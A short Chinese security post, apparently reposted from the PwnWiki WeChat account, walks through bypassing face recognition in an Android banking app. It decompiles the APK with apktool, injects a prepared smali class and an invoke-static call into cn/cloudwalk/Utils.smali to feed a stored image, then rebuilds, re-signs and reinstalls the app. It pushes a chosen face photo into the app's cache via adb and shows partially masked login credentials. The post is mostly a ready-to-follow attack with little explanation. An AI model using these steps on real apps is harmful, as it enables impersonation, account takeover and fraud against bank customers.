1.反编译xxxxAPP
apktool -r d app-pro-release.apk -o out/2.需改smali文件
2.1 放入预先准备好的StackPrint.smali文件
2.2 修改cn/cloudwalk/Utils.smali文件
在Utils.smali文件中,调用StackPrint.smali文件中的getDiskBitmap方法
invoke-static {}, Lcom/example/test/myapplication/StackPrint;->getDiskBitmap()Landroid/graphics/Bitmap;move-result-object p0
2.3 重新编译xx银行APP
apktool b out/ -o test13.apk2.4 重新签名APP
java -jar apksigner.jar sign --ks debug-android-key.jks --ks-key-alias key --ks-pass pass:android --key-pass pass:android --out test13_s.apk test13.apk3.安装重签名后的APP
adb install -r test13_s.apk4.人脸识别绕过
4.1 把正确的人脸图片放到 /data/data/com.csii.jsh.ui/cache路径下adb push face.jpeg /data/local/tmp/cp /data/local/tmp/face.jpeg /data/data/com.csii.jsh.ui/cache/face.jpgchown -R u0_a274:u0_a274 /data/data/com.csii.jsh.ui/cache/face.jpg4.2 启动APP,登录后,进行人脸识别
账号:1823xxxxx29
密码:q19xxxx4.3 人脸识别绕过
原文始发于微信公众号(PwnWiki):人脸识别绕过过程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论